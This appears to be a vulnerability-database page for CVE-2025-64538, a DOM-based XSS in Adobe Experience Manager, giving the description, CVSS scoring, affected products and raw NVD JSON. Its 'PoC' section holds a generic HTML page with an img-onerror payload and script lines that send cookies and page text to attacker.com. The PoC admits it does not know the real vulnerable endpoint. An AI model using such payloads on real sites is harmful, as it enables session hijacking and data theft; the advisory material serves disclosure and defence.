Security Vulnerability Report
中文
CVE-2025-64538 CVSS 9.3 CRITICAL

CVE-2025-64538

Published: 2025-12-10 19:16:15
Last Modified: 2025-12-12 19:58:16

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64538 PoC - DOM-based XSS in Adobe Experience Manager --> <!-- This PoC demonstrates the DOM XSS vulnerability in AEM --> <!DOCTYPE html> <html> <head> <title>CVE-2025-64538 PoC</title> </head> <body> <h1>CVE-2025-64538 - Adobe Experience Manager DOM XSS PoC</h1> <!-- Malicious URL that triggers the XSS --> <p>Malicious URL:</p> <code id="malicious-url"></code> <script> // Simulating the vulnerable endpoint pattern // In real scenario, the vulnerable parameter would be reflected in DOM without sanitization function demonstrateXSS() { // Example vulnerable URL pattern for AEM // Replace 'VULNERABLE_ENDPOINT' with actual affected endpoint const baseUrl = window.location.origin; const maliciousPayload = '<img src=x onerror="alert(document.cookie)"> '; // Display the constructed URL const vulnerableUrl = baseUrl + '/content?param=' + encodeURIComponent(maliciousPayload); document.getElementById('malicious-url').textContent = vulnerableUrl; // In actual exploitation, this would be sent to victims console.log('Vulnerable URL:', vulnerableUrl); } demonstrateXSS(); // Attacker's script that would be injected const attackerScript = ` // Steal session cookies fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)); // Perform actions on behalf of user // Example: Read sensitive content const sensitiveData = document.body.innerText; fetch('https://attacker.com/exfil?data=' + encodeURIComponent(sensitiveData)); `; </script> <p><strong>Note:</strong> This is a demonstration of the vulnerability pattern. Actual exploitation requires identifying the specific vulnerable endpoint in AEM.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64538", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:15.153", "lastModified": "2025-12-12T19:58:16.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}